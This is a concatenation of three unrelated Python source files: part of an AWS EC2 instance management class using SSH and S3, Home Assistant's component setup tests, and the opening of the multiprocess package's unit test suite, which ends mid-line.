be reused and no new instance will be started. When finished, call `cleanup`. `cleanup` will also be registered as an `atexit` cleanup function so that it will still be called despite any errors. """ atexit.register(self.cleanup) if not self._exists(): self._start_and_wait() if self._spot_bid is not None: self._start_termination_monitoring() else: # If the instance already exists, assume it's a spot instance, just # to be safe. self._start_termination_monitoring() self._log.debug("Done.") def __str__(self): """Return a string representation of this instance. Returns: str: The representation. """ return "Inst[%s]" % self._name def public_ip(self): """Get the public IP address of this instance. Returns: str: The IP address. """ if self.elastic_ip: return self.elastic_ip.public_ip return self.instance.public_ip_address def private_ip(self): """Get the private IP address of this instance. Returns: str: The IP address. """ return self.instance.private_ip_address def run_command(self, command, check=True): """Run a command on this instance. Args: command (str): The command to run. check (bool): Whether to raise an error if the exit code of the command is nonzero. Returns: tuple[int, bytes, bytes]: The exit code, stdout, and stderr, respectively, of the process. """ if self._buffering_commands: print("BUFFERING COMMANDS") self._buffered_commands.append(command) return 0, "", "" if self._ssh_client is None: self._log.debug("Calling _connect_ssh.") self._connect_ssh() # self.instance.load() self._log.debug("Running `%s`." % command) _, stdout, stderr = self._ssh_client.exec_command(command) # exec_command is asynchronous. The following waits for completion. self._log.debug("Waiting for completion.") self._log.debug("Fetching stdout and stderr.") stdout_data, stderr_data = stdout.read(), stderr.read() self._log.debug("stdout had length %d." % len(stdout_data)) self._log.debug("stderr had length %d." % len(stderr_data)) status = stdout.channel.recv_exit_status() self._log.debug("Exit code was %d." % status) self._log.debug("stdout: ") self._log.debug(stdout_data) self._log.debug("stderr: ") self._log.debug(stderr_data) if check and status != 0: raise RuntimeError("`%s` returned nonzero exit code %d. The stderr " "follows.\n%s" % (command, status, stderr_data)) self._log.debug("Done.") return status, stdout_data, stderr_data def buffer_commands(self, flag): """Enable or disable command buffering for this instance. When command buffering is enabled, calls to `run_command` do not immediately run commands on the instance. Instead, commands are collected in a queue. The queue of commands is run all at once when `buffer_commands` is used to disable command buffering. This is useful for batching commands, which increases efficiency. Args: flag (bool): If True, command buffering will be enabled. If False, command buffering will be disabled. """ if flag == False and self._buffering_commands == True: concat_command = "\n".join(self._buffered_commands) self._buffered_commands = [] self._buffering_commands = False return self.run_command(concat_command) else: if flag == True and self._buffering_commands == False: self._buffering_commands = True return 0, "", "" def download_s3(self, src, dest): """Download a file from S3 to this instance. Does not require that the AWS CLI be installed. Args: src (str): A path to a file on S3. dest (str): The path at which to save the file on this instance. If relative, then relative to the home folder of this instance's SSH user. """ from . import automate assert src.startswith("s3://") assert not dest.startswith("s3://") bucket, key = automate._split_s3_url(src) # print("BUCKET") # print(bucket) # print("KEY") # print(key) # print("DEST") # print(dest) # s3_client = boto3.client('s3') # obj = s3_client.get_object(Bucket=bucket, Key=key) # s3 = boto3.client('s3') # s3.download_file(bucket, key, dest) # print("OBJECT: ") # print(obj) self.run_command("wget http://%s.s3.amazonaws.com/%s -O %s" % (bucket, key, dest)) def upload_s3(self, src, dest, public): """Upload a file from this instance to S3. Requires that the AWS CLI be installed. Args: src (str): A path to a file on this instance. If relative, then relative to the home folder of this instance's SSH user. dest (str): A path on S3 to upload to. public (bool): Whether to give the resulting S3 object the "public-read" ACL. """ assert not src.startswith("s3://") assert dest.startswith("s3://") command = ["aws", "s3", "cp", src, dest] if public: command.extend(("--acl", "public-read")) self.run_command(" ".join(command)) def upload(self, content, dest): """Upload a file to the instance. Args: content (str): The content of the file. dest (str): The path on the instance to upload to. """ if self._sftp_client is None: self._connect_sftp() fo = io.StringIO(content) self._sftp_client.putfo(fo, dest) def save_image(self, name, reboot=True): """Create an AMI from the current state of this instance. Stops the instance in the process. Args: name (str): The name to give the AMI. reboot (bool): Whether to boot the instance after creating the AMI. If False, the instance will be left stopped. If omitted, True. """ self._log.debug("Stopping instance.") self.instance.stop() self._wait_until_state("stopped") self._log.debug("Starting image creation.") image = self.instance.create_image(Name=name) self._log.debug("Waiting for image creation.") image.wait_until_exists() for i in range(self.IMAGE_POLL_MAX): self._log.debug("Doing poll #%d out of %d." % (i+1, self.IMAGE_POLL_MAX)) image.reload() if image.state == "available": break time.sleep(self.IMAGE_POLL_INTERVAL) else: raise RuntimeError("AMI did not become available within time " "constraints.") if reboot: self._log.debug("Starting instance.") self.instance.start() self._wait_until_state("running") self._log.debug("Done.") def cleanup(self): """Terminate the instance and clean up all associated resources. """ try: if self._should_stop_monitoring is not None: self._should_stop_monitoring.set() if self._sftp_client is not None: self._log.debug("Closing SFTP client.") self._sftp_client.close() self._sftp_client = None if self._ssh_client is not None: self._log.debug("Closing SSH client.") self._ssh_client.close() self._ssh_client = None if self.instance is not None: self._log.debug("Terminating instance.") self.instance.terminate() self._log.debug("Waiting for instance to terminate.") self.instance.wait_until_terminated() self.instance = None if self.elastic_ip is not None: self._log.debug("Releasing Elastic IP") try: self.release_elastic_ip(self.elastic_ip.allocation_id) except: pass self._log.debug("Done.") except: MESSAGE = "An error occured during cleanup. Some EC2 resources " \ "may remain. Delete them manually." print("=" * len(MESSAGE)) print(MESSAGE) print("=" * len(MESSAGE)) raise sys.exc_info()[1] def _exists(self): self._log.debug("Listing instances.") name_filter = { "Name": "tag:Name", "Values": [self._name] } state_filter = { "Name": "instance-state-name", "Values": ["running"] } filters = [name_filter, state_filter] instances = list( resources.ec2_resource.instances.filter(Filters=filters)) if len(instances) > 0: self._log.info("An existing instance with the same name was found.") self.instance = instances[0] name = self._name + "_instance_profile" self._instance_profile = \ resources.iam_resource.InstanceProfile(name) return True self._log.info("No existing instance with the same name was found.") return False def allocate_elastic_ip(self): """ Allocates an Elastic IP address that can be associated with an instance. By using an Elastic IP address, you can keep the public IP address constant even when you change the associated instance. :return: The newly created Elastic IP object. By default, the address is not associated with any instance. """ try: response = ec2.meta.client.allocate_address(Domain='vpc') elastic_ip = ec2.VpcAddress(response['AllocationId']) self._log.debug("Allocated Elastic IP %s.", elastic_ip.public_ip) except ClientError: self._log.debug("Couldn't allocate Elastic IP.") raise else: return elastic_ip def associate_elastic_ip(self, allocation_id, instance_id): """ Associates an Elastic IP address with an instance. When this association is created, the Elastic IP's public IP address is immediately used as the public IP address of the associated instance. :param allocation_id: The allocation ID assigned to the Elastic IP when it was created. :param instance_id: The ID of the instance to associate with the Elastic IP. :return: The Elastic IP object. """ try: elastic_ip = ec2.VpcAddress(allocation_id) elastic_ip.associate(InstanceId=instance_id) self._log.debug("Associated Elastic IP %s with instance %s, got association ID %s", elastic_ip.public_ip, instance_id, elastic_ip.association_id) except ClientError: self._log.debug( "Couldn't associate Elastic IP %s with instance %s.", allocation_id, instance_id) raise return elastic_ip def disassociate_elastic_ip(self, allocation_id): """ Removes an association between an Elastic IP address and an instance. When the association is removed, the instance is assigned a new public IP address. :param allocation_id: The allocation ID assigned to the Elastic IP address when it was created. """ try: elastic_ip = ec2.VpcAddress(allocation_id) elastic_ip.association.delete() self._log.debug( "Disassociated Elastic IP %s from its instance.", elastic_ip.public_ip) except ClientError: self._log.debug( "Couldn't disassociate Elastic IP %s from its instance.", allocation_id) raise def release_elastic_ip(self, allocation_id): """ Releases an Elastic IP address. After the Elastic IP address is released, it can no longer be used. :param allocation_id: The allocation ID assigned to the Elastic IP address when it was created. """ try: elastic_ip = ec2.VpcAddress(allocation_id) elastic_ip.release() self._log.debug("Released Elastic IP address %s.", allocation_id) except ClientError: self._log.debug( "Couldn't release Elastic IP address %s.", allocation_id) raise def _start_and_wait(self): self._log.debug("Starting a new instance.") tag = { "Key": "Name", "Value": self._name } tag_spec = { "ResourceType": "instance", "Tags": [tag] } block_dev = { "DeviceName": "/dev/xvda", "Ebs": { "DeleteOnTermination": True, "VolumeSize": self._disk_size, } } # block_dev2 = { # "DeviceName": "/dev/sda1", # "Ebs": { # "DeleteOnTermination": True, # "VolumeSize": self._disk_size, # } # } create_args = { "BlockDeviceMappings": [block_dev], # "BlockDeviceMappings": [block_dev, block_dev2], "KeyName": self.KEY_PAIR_NAME, "ImageId": self._ami_id, "InstanceType": self._type, "MinCount": 1, "MaxCount": 1, "SecurityGroups": [self.SECURITY_GROUP_NAME], "IamInstanceProfile": {"Name": self.INSTANCE_PROFILE_NAME}, "TagSpecifications": [tag_spec] } if self._spot_bid is not None: create_args["InstanceMarketOptions"] = { "MarketType": "spot", "SpotOptions": { "MaxPrice": self._spot_bid, "SpotInstanceType": "one-time", "InstanceInterruptionBehavior": "terminate" } } instances = resources.ec2_resource.create_instances(**create_args) self.instance = instances[0] addresses = ec2.meta.client.describe_addresses() self.elastic_ip = self.allocate_elastic_ip() self._log.debug(f"Allocated static Elastic IP address: {self.elastic_ip.public_ip}.") self._log.debug("Waiting for instance to enter running state.") # self._wait_until_state("running") self.instance.wait_until_running() self._log.debug("Fetching instance metadata.") # Reloads metadata about the instance. In particular, retreives its # public_ip_address. self.instance.load() self._log.debug("Associating elastic IP.") self.associate_elastic_ip(self.elastic_ip.allocation_id, self.instance.instance_id) self._log.debug("Done.") def _wait_until_state(self, state): """Wait until this instance enters a given state. Args: state (str): The name of the state. Raises: RuntimeError: The timeout is reached before the instance enters the given state. """ start = time.time() while time.time() - start < self._RUNNING_POLL_TIMEOUT: self.instance.reload() if self.instance.state["Name"] == state: break time.sleep(self._RUNNING_POLL_INTERVAL) else: raise RuntimeError("Timed out waiting for instance to enter " "\"%s\" state." % state) def _start_termination_monitoring(self): def is_marked_for_termination(): self._log.debug("Checking whether marked for termination.") command = "curl -s -o /dev/null -w \"%%{http_code}\" %s" \ % INSTANCE_ACTION_URL status, out, _ = self.run_command(command, False) return out != "404" def monitor_forever(): self._log.debug("Beginning termination monitoring.") while not self._should_stop_monitoring.is_set(): if is_marked_for_termination(): raise RuntimeError("%s is marked for termination by the " "AWS spot service!" % self) time.sleep(TERMINATION_MONITORING_INTERVAL) self._should_stop_monitoring = threading.Event() thread_name = "%s Monitor" % self thread = threading.Thread(target=monitor_forever, name=thread_name) thread.start() def _connect_ssh(self, timeout=3, attempts=35): self._log.debug("Configuring.") with open(os.path.expanduser(self.PRIVATE_KEY_PATH), "r") as f: key = paramiko.RSAKey.from_private_key(f) self._ssh_client = paramiko.SSHClient() self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) authentication_failures = 0 for i in range(attempts): try: self._log.debug("Making connection attempt #%d out of %d." % (i+1, attempts)) # self._log.debug(f"IP ADDRESS TO CONNECT TO: {self.instance.public_ip()}") self._ssh_client.connect( hostname=self.elastic_ip.public_ip, username=self._username, pkey=key, timeout=timeout, # allow_agent=False and look_for_keys=False ensure that # Paramiko doesn't go looking for other keys. allow_agent=False, look_for_keys=False ) self._ssh_client.get_transport().window_size = 2147483647 self._ssh_client.get_transport().set_keepalive(SSH_KEEPALIVE) except socket.timeout: self._log.debug("Connection attempt timed out after %ds." % timeout) pass except paramiko.ssh_exception.NoValidConnectionsError: self._log.debug("Connection attempt failed. Sleeping for %ds." % timeout) time.sleep(timeout) pass except paramiko.ssh_exception.AuthenticationException: # If we attempt to connect while systemd happens to be starting # up, then our request will be purposely blocked. Try again, # but not too many times, since there may be an actual # authentication issue. authentication_failures += 1 if authentication_failures <= self._AUTHENTICATION_FAILURES: time.sleep(timeout) pass else: raise except Exception as exc: print(exc) else: break else: pass # FIXME def _connect_sftp(self): if self._ssh_client is None: self._connect_ssh() self._sftp_client = self._ssh_client.open_sftp()
test_setup.py
"""Test component/platform setup.""" # pylint: disable=protected-access import asyncio import logging import os import threading from unittest import mock import voluptuous as vol from homeassistant import setup import homeassistant.config as config_util from homeassistant.const import EVENT_COMPONENT_LOADED, EVENT_HOMEASSISTANT_START from homeassistant.core import callback from homeassistant.helpers import discovery from homeassistant.helpers.config_validation import ( PLATFORM_SCHEMA, PLATFORM_SCHEMA_BASE, ) import homeassistant.util.dt as dt_util from tests.common import ( MockModule, MockPlatform, assert_setup_component, get_test_config_dir, get_test_home_assistant, mock_entity_platform, mock_integration, ) ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE VERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE) _LOGGER = logging.getLogger(__name__) class TestSetup: """Test the bootstrap utils.""" hass = None backup_cache = None # pylint: disable=invalid-name, no-self-use def setup_method(self, method): """Set up the test.""" self.hass = get_test_home_assistant() def teardown_method(self, method): """Clean up.""" self.hass.stop() def test_validate_component_config(self): """Test validating component configuration.""" config_schema = vol.Schema({"comp_conf": {"hello": str}}, required=True) mock_integration( self.hass, MockModule("comp_conf", config_schema=config_schema) ) with assert_setup_component(0): assert not setup.setup_component(self.hass, "comp_conf", {}) self.hass.data.pop(setup.DATA_SETUP) with assert_setup_component(0): assert not setup.setup_component( self.hass, "comp_conf", {"comp_conf": None} ) self.hass.data.pop(setup.DATA_SETUP) with assert_setup_component(0): assert not setup.setup_component(self.hass, "comp_conf", {"comp_conf": {}}) self.hass.data.pop(setup.DATA_SETUP) with assert_setup_component(0): assert not setup.setup_component( self.hass, "comp_conf", {"comp_conf": {"hello": "world", "invalid": "extra"}}, ) self.hass.data.pop(setup.DATA_SETUP) with assert_setup_component(1): assert setup.setup_component( self.hass, "comp_conf", {"comp_conf": {"hello": "world"}} ) def test_validate_platform_config(self, caplog): """Test validating platform configuration.""" platform_schema = PLATFORM_SCHEMA.extend({"hello": str}) platform_schema_base = PLATFORM_SCHEMA_BASE.extend({}) mock_integration( self.hass, MockModule("platform_conf", platform_schema_base=platform_schema_base), ) mock_entity_platform( self.hass, "platform_conf.whatever", MockPlatform(platform_schema=platform_schema), ) with assert_setup_component(0): assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": {"platform": "not_existing", "hello": "world"}}, ) self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("platform_conf") with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": {"platform": "whatever", "hello": "world"}}, ) self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("platform_conf") with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": [{"platform": "whatever", "hello": "world"}]}, ) self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("platform_conf") # Any falsey platform config will be ignored (None, {}, etc) with assert_setup_component(0) as config: assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": None} ) assert "platform_conf" in self.hass.config.components assert not config["platform_conf"] # empty assert setup.setup_component( self.hass, "platform_conf", {"platform_conf": {}} ) assert "platform_conf" in self.hass.config.components assert not config["platform_conf"] # empty def test_validate_platform_config_2(self, caplog): """Test component PLATFORM_SCHEMA_BASE prio over PLATFORM_SCHEMA.""" platform_schema = PLATFORM_SCHEMA.extend({"hello": str}) platform_schema_base = PLATFORM_SCHEMA_BASE.extend({"hello": "world"}) mock_integration( self.hass, MockModule( "platform_conf", platform_schema=platform_schema, platform_schema_base=platform_schema_base, ), ) mock_entity_platform( self.hass, "platform_conf.whatever", MockPlatform("whatever", platform_schema=platform_schema), ) with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", { # pass "platform_conf": {"platform": "whatever", "hello": "world"}, # fail: key hello violates component platform_schema_base "platform_conf 2": {"platform": "whatever", "hello": "there"}, }, ) def test_validate_platform_config_3(self, caplog): """Test fallback to component PLATFORM_SCHEMA.""" component_schema = PLATFORM_SCHEMA_BASE.extend({"hello": str}) platform_schema = PLATFORM_SCHEMA.extend({"cheers": str, "hello": "world"}) mock_integration( self.hass, MockModule("platform_conf", platform_schema=component_schema) ) mock_entity_platform( self.hass, "platform_conf.whatever", MockPlatform("whatever", platform_schema=platform_schema), ) with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", { # pass "platform_conf": {"platform": "whatever", "hello": "world"}, # fail: key hello violates component platform_schema "platform_conf 2": {"platform": "whatever", "hello": "there"}, }, ) def test_validate_platform_config_4(self): """Test entity_namespace in PLATFORM_SCHEMA.""" component_schema = PLATFORM_SCHEMA_BASE platform_schema = PLATFORM_SCHEMA mock_integration( self.hass, MockModule("platform_conf", platform_schema_base=component_schema), ) mock_entity_platform( self.hass, "platform_conf.whatever", MockPlatform(platform_schema=platform_schema), ) with assert_setup_component(1): assert setup.setup_component( self.hass, "platform_conf", { "platform_conf": { # pass: entity_namespace accepted by PLATFORM_SCHEMA "platform": "whatever", "entity_namespace": "yummy", } }, ) self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("platform_conf") def test_component_not_found(self): """setup_component should not crash if component doesn't exist.""" assert setup.setup_component(self.hass, "non_existing", {}) is False def test_component_not_double_initialized(self): """Test we do not set up a component twice.""" mock_setup = mock.MagicMock(return_value=True) mock_integration(self.hass, MockModule("comp", setup=mock_setup)) assert setup.setup_component(self.hass, "comp", {}) assert mock_setup.called mock_setup.reset_mock() assert setup.setup_component(self.hass, "comp", {}) assert not mock_setup.called @mock.patch("homeassistant.util.package.install_package", return_value=False) def test_component_not_installed_if_requirement_fails(self, mock_install): """Component setup should fail if requirement can't install.""" self.hass.config.skip_pip = False mock_integration(self.hass, MockModule("comp", requirements=["package==0.0.1"])) assert not setup.setup_component(self.hass, "comp", {}) assert "comp" not in self.hass.config.components def test_component_not_setup_twice_if_loaded_during_other_setup(self): """Test component setup while waiting for lock is not set up twice.""" result = [] @asyncio.coroutine def async_setup(hass, config): """Tracking Setup.""" result.append(1) mock_integration(self.hass, MockModule("comp", async_setup=async_setup)) def setup_component(): """Set up the component.""" setup.setup_component(self.hass, "comp", {}) thread = threading.Thread(target=setup_component) thread.start() setup.setup_component(self.hass, "comp", {}) thread.join() assert len(result) == 1 def test_component_not_setup_missing_dependencies(self): """Test we do not set up a component if not all dependencies loaded.""" deps = ["maybe_existing"] mock_integration(self.hass, MockModule("comp", dependencies=deps)) assert not setup.setup_component(self.hass, "comp", {}) assert "comp" not in self.hass.config.components self.hass.data.pop(setup.DATA_SETUP) mock_integration(self.hass, MockModule("comp2", dependencies=deps)) mock_integration(self.hass, MockModule("maybe_existing")) assert setup.setup_component(self.hass, "comp2", {}) def test_component_failing_setup(self): """Test component that fails setup.""" mock_integration( self.hass, MockModule("comp", setup=lambda hass, config: False) ) assert not setup.setup_component(self.hass, "comp", {}) assert "comp" not in self.hass.config.components def test_component_exception_setup(self): """Test component that raises exception during setup.""" def exception_setup(hass, config): """Raise exception.""" raise Exception("fail!") mock_integration(self.hass, MockModule("comp", setup=exception_setup)) assert not setup.setup_component(self.hass, "comp", {}) assert "comp" not in self.hass.config.components def test_component_setup_with_validation_and_dependency(self): """Test all config is passed to dependencies.""" def config_check_setup(hass, config): """Test that config is passed in.""" if config.get("comp_a", {}).get("valid", False): return True raise Exception("Config not passed in: {}".format(config)) platform = MockPlatform() mock_integration(self.hass, MockModule("comp_a", setup=config_check_setup)) mock_integration( self.hass, MockModule("platform_a", setup=config_check_setup, dependencies=["comp_a"]), ) mock_entity_platform(self.hass, "switch.platform_a", platform) setup.setup_component( self.hass, "switch", {"comp_a": {"valid": True}, "switch": {"platform": "platform_a"}}, ) assert "comp_a" in self.hass.config.components def test_platform_specific_config_validation(self): """Test platform that specifies config.""" platform_schema = PLATFORM_SCHEMA.extend( {"valid": True}, extra=vol.PREVENT_EXTRA ) mock_setup = mock.MagicMock(spec_set=True) mock_entity_platform( self.hass, "switch.platform_a", MockPlatform(platform_schema=platform_schema, setup_platform=mock_setup), ) with assert_setup_component(0, "switch"): assert setup.setup_component( self.hass, "switch", {"switch": {"platform": "platform_a", "invalid": True}}, ) assert mock_setup.call_count == 0 self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("switch") with assert_setup_component(0): assert setup.setup_component( self.hass, "switch", { "switch": { "platform": "platform_a", "valid": True, "invalid_extra": True, } }, ) assert mock_setup.call_count == 0 self.hass.data.pop(setup.DATA_SETUP) self.hass.config.components.remove("switch") with assert_setup_component(1, "switch"): assert setup.setup_component( self.hass, "switch", {"switch": {"platform": "platform_a", "valid": True}}, ) assert mock_setup.call_count == 1 def test_disable_component_if_invalid_return(self): """Test disabling component if invalid return.""" mock_integration( self.hass, MockModule("disabled_component", setup=lambda hass, config: None) ) assert not setup.setup_component(self.hass, "disabled_component", {}) assert "disabled_component" not in self.hass.config.components self.hass.data.pop(setup.DATA_SETUP) mock_integration( self.hass, MockModule("disabled_component", setup=lambda hass, config: False), ) assert not setup.setup_component(self.hass, "disabled_component", {}) assert "disabled_component" not in self.hass.config.components self.hass.data.pop(setup.DATA_SETUP) mock_integration( self.hass, MockModule("disabled_component", setup=lambda hass, config: True) ) assert setup.setup_component(self.hass, "disabled_component", {}) assert "disabled_component" in self.hass.config.components def test_all_work_done_before_start(self): """Test all init work done till start.""" call_order = [] def component1_setup(hass, config): """Set up mock component.""" discovery.discover(hass, "test_component2", {}, "test_component2", {}) discovery.discover(hass, "test_component3", {}, "test_component3", {}) return True def component_track_setup(hass, config): """Set up mock component.""" call_order.append(1) return True mock_integration( self.hass, MockModule("test_component1", setup=component1_setup) ) mock_integration( self.hass, MockModule("test_component2", setup=component_track_setup) ) mock_integration( self.hass, MockModule("test_component3", setup=component_track_setup) ) @callback def track_start(event): """Track start event.""" call_order.append(2) self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, track_start) self.hass.add_job(setup.async_setup_component(self.hass, "test_component1", {})) self.hass.block_till_done() self.hass.start() assert call_order == [1, 1, 2] @asyncio.coroutine def test_component_cannot_depend_config(hass): """Test config is not allowed to be a dependency.""" result = yield from setup._async_process_dependencies( hass, None, "test", ["config"] ) assert not result @asyncio.coroutine def test_component_warn_slow_setup(hass): """Warn we log when a component setup takes a long time.""" mock_integration(hass, MockModule("test_component1")) with mock.patch.object(hass.loop, "call_later", mock.MagicMock()) as mock_call: result = yield from setup.async_setup_component(hass, "test_component1", {}) assert result assert mock_call.called assert len(mock_call.mock_calls) == 3 timeout, logger_method = mock_call.mock_calls[0][1][:2] assert timeout == setup.SLOW_SETUP_WARNING assert logger_method == setup._LOGGER.warning assert mock_call().cancel.called @asyncio.coroutine def test_platform_no_warn_slow(hass): """Do not warn for long entity setup time.""" mock_integration( hass, MockModule("test_component1", platform_schema=PLATFORM_SCHEMA) ) with mock.patch.object(hass.loop, "call_later", mock.MagicMock()) as mock_call: result = yield from setup.async_setup_component(hass, "test_component1", {}) assert result assert not mock_call.called async def test_when_setup_already_loaded(hass): """Test when setup.""" calls = [] async def mock_callback(hass, component): """Mock callback.""" calls.append(component) setup.async_when_setup(hass, "test", mock_callback) await hass.async_block_till_done() assert calls == [] hass.config.components.add("test") hass.bus.async_fire(EVENT_COMPONENT_LOADED, {"component": "test"}) await hass.async_block_till_done() assert calls == ["test"] # Event listener should be gone hass.bus.async_fire(EVENT_COMPONENT_LOADED, {"component": "test"}) await hass.async_block_till_done() assert calls == ["test"] # Should be called right away setup.async_when_setup(hass, "test", mock_callback) await hass.async_block_till_done() assert calls == ["test", "test"] async def test_setup_import_blows_up(hass): """Test that we handle it correctly when importing integration blows up.""" with mock.patch( "homeassistant.loader.Integration.get_component", side_effect=ValueError ): assert not await setup.async_setup_component(hass, "sun", {})
__init__.py
# # Unit tests for the multiprocess package # import unittest import queue as pyqueue import contextlib import time import io import itertools import sys import os import gc import errno import signal import array import socket import random import logging import struct import operator import weakref from test import support import test.support.script_helper # Skip tests if _multiprocessing wasn't built. _multiprocessing = support.import_module('_multiprocessing') # Skip tests if sem_open implementation is broken. support.import_module('multiprocess.synchronize') # import threading after _multiprocessing to raise a more relevant error # message: "No module named _multiprocessing". _multiprocessing is not compiled # without thread support. import threading import multiprocess.connection import multiprocess.dummy import multiprocess.heap import multiprocess.managers import multiprocess.pool import multiprocess.queues from multiprocess import util try: from multiprocess import reduction HAS_REDUCTION = reduction.HAVE_SEND_HANDLE except ImportError: HAS_REDUCTION = False try: from multiprocess.sharedctypes import Value, copy HAS_SHAREDCTYPES = True except ImportError: HAS_SHAREDCTYPES = False try: import msvcrt except ImportError: msvcrt = None # # # def latin(s): return s.encode('latin') def close_queue(queue): if isinstance(queue, multiprocess.queues.Queue): queue.close() queue.join_thread() # # Constants # LOG_LEVEL = util.SUBWARNING #LOG_LEVEL = logging.DEBUG DELTA = 0.1 CHECK_TIMINGS = False # making true makes tests take a lot longer # and can sometimes cause some non-serious # failures because some calls block a bit # longer than expected if CHECK_TIMINGS: TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4 else: TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1 HAVE_GETVALUE = not getattr(_multiprocessing, 'HAVE_BROKEN_SEM_GETVALUE', False) WIN32 = (sys.platform == "win32") from multiprocess.connection import wait def wait_for_handle(handle, timeout): if timeout is not None and timeout < 0.0: timeout = None return wait([handle], timeout) try: MAXFD = os.sysconf("SC_OPEN_MAX") except: MAXFD = 256 # To speed up tests when using the forkserver, we can preload these: PRELOAD = ['__main__', 'test_multiprocessing_forkserver'] # # Some tests require ctypes # try: from ctypes import Structure, c_int, c_double except ImportError: Structure = object c_int = c_double = None def check_enough_semaphores(): """Check that the system supports enough semaphores to run the test.""" # minimum number of semaphores available according to POSIX nsems_min = 256 try: nsems = os.sysconf("SC_SEM_NSEMS_MAX") except (AttributeError, ValueError): # sysconf not available or setting not available return if nsems == -1 or nsems >= nsems_min: return raise unittest.SkipTest("The OS doesn't support enough semaphores " "to run the test (required: %d)." % nsems_min) # # Creates a wrapper for a function which records the time it takes to finish # class TimingWrapper(object): def __init__(self, func): self.func = func self.elapsed = None def __call__(self, *args, **kwds): t = time.time() try: return self.func(*args, **kwds) finally: self.elapsed = time.time() - t # # Base class for test cases # class BaseTestCase(object): ALLOWED_TYPES = ('processes', 'manager', 'threads') def assertTimingAlmostEqual(self, a, b): if CHECK_TIMINGS: self.assertAlmostEqual(a, b, 1) def assertReturnsIfImplemented(self, value, func, *args): try: res = func(*args) except NotImplementedError: pass else: return self.assertEqual(value, res) # For the sanity of Windows users, rather than crashing or freezing in # multiple ways. def __reduce__(self, *args): raise NotImplementedError("shouldn't try to pickle a test case") __reduce_ex__ = __reduce__ # # Return the value of a semaphore # def get_value(self): try: return self.get_value() except AttributeError: try: return self._Semaphore__value except AttributeError: try: return self._value except AttributeError: raise NotImplementedError # # Testcases # class DummyCallable: def __call__(self, q, c): assert isinstance(c, DummyCallable) q.put(5) class _TestProcess(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') def test_current(self): if self.TYPE == 'threads': self.skipTest('test not appropriate for {}'.format(self.TYPE)) current = self.current_process() authkey = current.authkey self.assertTrue(current.is_alive()) self.assertTrue(not current.daemon) self.assertIsInstance(authkey, bytes) self.assertTrue(len(authkey) > 0) self.assertEqual(current.ident, os.getpid()) self.assertEqual(current.exitcode, None) def test_daemon_argument(self): if self.TYPE == "threads": self.skipTest('test not appropriate for {}'.format(self.TYPE)) # By default uses the current process's daemon flag. proc0 = self.Process(target=self._test) self.assertEqual(proc0.daemon, self.current_process().daemon) proc1 = self.Process(target=self._test, daemon=True) self.assertTrue(proc1.daemon) proc2 = self.Process(target=self._test, daemon=False) self.assertFalse(proc2.daemon) @classmethod def _test(cls, q, *args, **kwds): current = cls.current_process() q.put(args) q.put(kwds) q.put(current.name) if cls.TYPE != 'threads': q.put(bytes(current.authkey)) q.put(current.pid) def test_process(self): q = self.Queue(1) e = self.Event() args = (q, 1, 2) kwargs = {'hello':23, 'bye':2.54} name = 'SomeProcess' p = self.Process( target=self._test, args=args, kwargs=kwargs, name=name ) p.daemon = True current = self.current_process() if self.TYPE != 'threads': self.assertEqual(p.authkey, current.authkey) self.assertEqual(p.is_alive(), False) self.assertEqual(p.daemon, True) self.assertNotIn(p, self.active_children()) self.assertTrue(type(self.active_children()) is list) self.assertEqual(p.exitcode, None) p.start() self.assertEqual(p.exitcode, None) self.assertEqual(p.is_alive(), True) self.assertIn(p, self.active_children()) self.assertEqual(q.get(), args[1:]) self.assertEqual(q.get(), kwargs) self.assertEqual(q.get(), p.name) if self.TYPE != 'threads': self.assertEqual(q.get(), current.authkey) self.assertEqual(q.get(), p.pid) p.join() self.assertEqual(p.exitcode, 0) self.assertEqual(p.is_alive(), False) self.assertNotIn(p, self.active_children()) close_queue(q) @classmethod def _test_terminate(cls): time.sleep(100) def test_terminate(self): if self.TYPE == 'threads': self.skipTest('test not appropriate for {}'.format(self.TYPE)) p = self.Process(target=self._test_terminate) p.daemon = True p.start() self.assertEqual(p.is_alive(), True) self.assertIn(p, self.active_children()) self.assertEqual(p.exitcode, None) join = TimingWrapper(p.join) self.assertEqual(join(0), None) self.assertTimingAlmostEqual(join.elapsed, 0.0) self.assertEqual(p.is_alive(), True) self.assertEqual(join(-1), None) self.assertTimingAlmostEqual(join.elapsed, 0.0) self.assertEqual(p.is_alive(), True) # XXX maybe terminating too soon causes the problems on Gentoo... time.sleep(1) p.terminate() if hasattr(signal, 'alarm'): # On the Gentoo buildbot waitpid() often seems to block forever. # We use alarm() to interrupt it if it blocks for too long. def handler(*args): raise RuntimeError('join took too long: %s' % p) old_handler = signal.signal(signal.SIGALRM, handler) try: signal.alarm(10) self.assertEqual(join(), None) finally: signal.alarm(0) signal.signal(signal.SIGALRM, old_handler) else: self.assertEqual(join(), None) self.assertTimingAlmostEqual(join.elapsed, 0.0) self.assertEqual(p.is_alive(), False) self.assertNotIn(p, self.active_children()) p.join() # XXX sometimes get p.exitcode == 0 on Windows ... #self.assertEqual(p.exitcode, -signal.SIGTERM) def test_cpu_count(self): try: cpus = multiprocess.cpu_count() except NotImplementedError: cpus = 1 self.assertTrue(type(cpus) is int) self.assertTrue(cpus >= 1) def test_active_children(self): self.assertEqual(type(self.active_children()), list) p = self.Process(target=time.sleep, args=(DELTA,)) self.assertNotIn(p, self.active_children()) p.daemon = True p.start() self.assertIn(p, self.active_children()) p.join() self.assertNotIn(p, self.active_children()) @classmethod def _test_recursion(cls, wconn, id): wconn.send(id) if len(id) < 